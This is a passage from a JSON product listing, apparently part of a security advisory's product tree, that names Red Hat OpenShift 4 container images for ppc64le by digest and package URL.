"purl": "pkg:oci/openshift/ose-kube-rbac-proxy-rhel9@sha256%3Afdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563881"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-state-metrics-rhel9@sha256%3Aaff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564691"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-marketplace-rhel9@sha256%3A5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564608"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-monitoring-plugin-rhel9@sha256%3A210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577192"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-cni-rhel9@sha256%3Ab7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605333"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-cni-microshift-rhel9@sha256%3A4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572688"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-networkpolicy-rhel9@sha256%3Aeab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572927"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-networking-console-plugin-rhel9@sha256%3Af716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577127"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-server-rhel9@sha256%3A7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605151"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"product_id": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/oc-mirror-plugin-rhel9@sha256%3Aa35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565249"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-builder-rhel9@sha256%3Af09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606800"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cli-rhel9@sha256%3A1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563791"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9@sha256%3A2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775630129"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9-operator@sha256%3Aed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606311"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-deployer-rhel9@sha256%3A3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577046"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-haproxy-router-rhel9@sha256%3Ac3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577060"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hyperkube-rhel9@sha256%3Ae3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557435"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-keepalived-ipfailover-rhel9@sha256%3Adda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604322"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-pod-rhel9@sha256%3Ae689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572233"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-registry-rhel9@sha256%3A8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605796"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tests-rhel9@sha256%3A132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775578545"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-state-metrics-rhel9@sha256%3A82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604183"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cluster-api-controllers-rhel9@sha256%3A1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606714"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"product_id": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/openstack-resource-controller-rhel9@sha256%3A23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606963"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-lifecycle-manager-rhel9@sha256%3Aa247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604626"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-registry-rhel9@sha256%3A350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565149"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-api-server-rhel9@sha256%3Ab72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606032"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-csr-approver-rhel9@sha256%3Af26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572826"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-node-agent-rhel9@sha256%3A1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606441"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-orchestrator-rhel9@sha256%3A69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572582"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-utils-rhel9@sha256%3A0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604573"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-apiserver-network-proxy-rhel9@sha256%3A13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564822"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"product_id": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/azure-service-rhel9-operator@sha256%3A055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606981"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-cluster-api-controllers-rhel9@sha256%3Ac029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557282"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-installer-rhel9@sha256%3A77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607663"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-rhel9-operator@sha256%3A07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557287"
}
}
},
{
"category": "product_version",
